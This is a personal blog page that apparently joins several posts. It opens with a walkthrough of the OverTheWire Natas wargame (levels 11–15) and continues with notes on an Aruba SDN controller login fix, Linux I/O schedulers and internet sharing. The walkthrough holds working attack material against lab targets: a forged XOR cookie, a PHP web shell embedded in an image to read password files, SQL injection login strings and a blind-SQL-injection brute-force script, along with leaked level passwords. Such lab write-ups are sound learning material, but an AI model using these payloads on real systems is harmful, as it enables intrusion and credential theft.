        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);



?>

 

Solution: Logic of XOR Encryption

If you check the source code and the server responses, you realize that  you know the cipher and plain text, so we can extract the xor_encryption key for this challenge.

Plain Text  XOR Key = Cipher Text

Cipher Text XOR Plain Text = Key

tesla@otuken:~$ curl -v -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org/
*   Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas11.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas11'
> GET / HTTP/1.1
> Host: natas11.natas.labs.overthewire.org
> Authorization: Basic bmF0YXMxMTpVODJxNVRDTU1ROXh1Rm9JM2RZWDYxczdPWkQ5SktvSw==
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 27 Nov 2018 17:41:41 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
< Vary: Accept-Encoding
< Content-Length: 1085
< Content-Type: text/html; charset=UTF-8

cipher is: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw

<?php
$data=array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo (json_encode($data));
?>

Result:

{"showpassword":"no","bgcolor":"#ffffff"}

Let’s use  {“showpassword”:”no”,”bgcolor”:”#ffffff”} as our key.

 

 

Key is: qw8J

 

Encrypted cookie for showing password is:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

 

curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" http://natas11.natas.labs.overthewire.org

 

 

Password for natas12 is: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Natas12:

URL: http://natas12.natas.labs.overthewire.org/

1- Install exiftool.

2- Create a very small jpg image which is less than 1KiB and name it white.jpg (small white background is enough)

3- Next step is injecting malicious php code inside the white.jpg by using exiftool.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas13'); ?>" white.jpg

 

tesla@otuken:~/Downloads$ exiftool white.jpg
ExifTool Version Number         : 10.80
File Name                       : white.jpg
Directory                       : .
File Size                       : 917 bytes
File Modification Date/Time     : 2018:11:27 22:11:00+04:00
File Access Date/Time           : 2018:11:27 22:11:00+04:00
File Inode Change Date/Time     : 2018:11:27 22:11:00+04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Document Name                   : <?php system('cat /etc/natas_webpass/natas13'); ?>
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Image Width                     : 51
Image Height                    : 51
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 51x51
Megapixels                      : 0.003

 

4- Open the browser and make web request to http://natas12.natas.labs.overthewire.org/

5- Open browser’s “Developer tools.” and the remove the type=”hidden” tag

6- And modify the suffix from jpg to php.

7- Click the link of the uploaded file. it will be interpret by the php.

 

 

 

Password for natas13 is: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Natas13: 

URL: http://natas13.natas.labs.overthewire.org

You can use the same method as we did on natas12. Only thing you have to do is changing the file.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas14'); ?>" white.jpg

 

 

Password for natas14 is: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas14:

URL: http://natas14.natas.labs.overthewire.org

 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas14', '<censored>'); 
    mysql_select_db('natas14', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    if(mysql_num_rows(mysql_query($query, $link)) > 0) { 
            echo "Successful login! The password for natas15 is <censored><br>"; 
    } else { 
            echo "Access denied!<br>"; 
    } 
    mysql_close($link); 
} else { 
?>

Solution:

username > ” or “1”=”1

password > ” or “1”=”1

 

Password for natas15 is: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas15:

<? 

/* 
CREATE TABLE `users` ( 
  `username` varchar(64) DEFAULT NULL, 
  `password` varchar(64) DEFAULT NULL 
); 
*/ 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas15', '<censored>'); 
    mysql_select_db('natas15', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    $res = mysql_query($query, $link); 
    if($res) { 
    if(mysql_num_rows($res) > 0) { 
        echo "This user exists.<br>"; 
    } else { 
        echo "This user doesn't exist.<br>"; 
    } 
    } else { 
        echo "Error in query.<br>"; 
    } 

    mysql_close($link); 
} else { 
?> 

//omitted...

Solution:

My first guess to solve this challenge was the into outfile statement. Unluckily, I do not have permission to create a file. For more information check secure_file_priv option of mysql server.

Example:

select * from users where username=”natas16″ into outfile “/var/www/html”

After three days of trying other methods. I stuck on this challenge. So, I had to get some hint. Hint was the “Blind Sql Injection”. After red over some pages in the blogs, I understand the logic and create my own solution to find the password. Basically script does brute-force by trying all the alphabets(uppercase, lowercase) and numbers.

 

#!/bin/bash

letters=""
for i in {a..z}
do
	letters+=$i
done

for i in {A..Z}
do
	letters+=$i
done

for i in {0..9}
do
	letters+=$i
done
#################################################################
echo $letters
echo ""
echo ""

key=""


for count in {1..40}
do
for (( i=0; i<${#letters}; i++ )); do
  letter="${letters:$i:1}"
	curl -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J "http://natas15.natas.labs.overthewire.org/index.php?debug&username=natas16%22%20%20and%20password%20like%20binary%20%22$key$letter%" | grep -i "This user exist."
	if [ $? -eq 0 ] ; then
		key+=$letter
	fi
done
done
echo "key is: $key"

 

 

Password for natas16 is: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Aruba VAN SDN Controller (invalid user & password combination specified!)

Hello,

In this post, I will give the resolution of Invalid user & password combination specified error by the Aruba VAN SDN Controller after fresh installation from the deb. package

Ubuntu version for the SDN Controller.

tesla@hpcontroller:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

Problem: invalid user & password combination specified!

Resolution: Re-installation of keystone.

 

$ sudo service sdnc stop
$ sudo apt-get purge keystone
$ sudo rm -Rf /var/lib/keystone/
$ sudo apt-get install keystone
$ sudo /opt/sdn/admin/config_local_keystone
$ sudo service sdnc start

After that you can login to the system with default username and password:

 

 

 

username: sdn

password:skyline

 

 

How to Change I/O Scheduler in Linux

Linux kernel is one of the most complicated software which is being used variety of systems such as laptops, embedded devices, hand-held devices, Database servers, supercomputers etc., All these kind of devices  demand different type of requirements. Some of the applications require fast response to user input.

As you know, disk is the slowest physical device in Computer world. Even though, SSD disk are available in the market. I/O scheduler enables to access to disk optimized way. Linux kernel has variety of I/O schedulers that greatly influence the I/O performance. There is no the best I/O scheduler over the other. Each I/O scheduler delivers best performance based on application.

For example;  one study observed that the Apache web server could achieve up to 71% more throughput using the anticipatory I/O scheduler. On the other hand, the anticipatory scheduler has been observed to result in a slowdown on a database run. (http://www.admin-magazine.com/HPC/Articles/Linux-I-O-Schedulers)

Currently Linux has several I/O schedulers which are;

  • – Completely Fair Queuing (CFQ)
  •  – Deadline
  • – NOOP
  • – Anticipatory

 

I will not get into more detail on this post, but if you really wonder you can find in the link.

How to see active I/O Scheduler?

On my system active I/O Scheduler is CFQ. Shows that the current I/O scheduler (in square brackets) is cfq.

tesla@otuken:~$ cat /sys/block/sda/queue/scheduler
noop deadline [cfq]

How To change I/O Scheduler?

To change the scheduler, just echo the name of the desired scheduler

root@otuken:~# echo noop > /sys/block/sda/queue/scheduler
root@otuken:~# cat /sys/block/sda/queue/scheduler 
[noop] deadline cfq 

Kernel, does not change the I/O scheduler immediately  before all of the requests which belong to the previous one are  completed.

How to change I/O scheduler in Grub and Grub2?

https://access.redhat.com/solutions/32376

 

Sharing Internet in Linux

Hi Folks!

Today, I installed Ubuntu 18.04 LTS on my personal laptop. But I could not connect to the Internet as Ubuntu does not recognize my wireless driver. After couple of googling I have found my wireless driver .[model:Broadcom Limited BCM43142 802.11b/g/n]. But the problem is how I am going to hook-up to the Internet  to install my driver?

I realized that, I have my company’s laptop which is Lenovo T460 which is one of the best free-DOS laptop. 🙂 I booted it up with Ubuntu Live CD. Finally I made the configuration in the Figure -1.

 

 

 

 

 

Figure – 1 Sample Configuration For Sharing Internet.

After above configuration. Everything is worked excellent — I am able to hook-up to the Internet on my Asus laptop via Lenovo laptop.

To be honest, before above configuration I tried to bridge Ethernet interface with Wireless Interface on the Lenovo laptop. But It is not permitted. After some research I have found this.

http://kerneltrap.org/mailarchive/linux-ath5k-devel/2010/3/21/6871733

It’s no longer possible to add an interface in the managed mode to a
bridge. You should run hostapd first to pure the interface to the
master mode.

Bridging doesn’t work on the station side anyway because the 802.11
header has three addresses (except when WDS is used) omitting the
address that would be needed for a station to send or receive a packet
on behalf of another system.

Final:

Necessary package to be installed for Broadcam Wireless driver.

tesla@otuken:~$ sudo apt-get update
tesla@otuken:~$ sudo apt-get install bcmwl-kernel-source

After Installed the package and  rebooted my laptop. It WORKED LIKE A CHARM!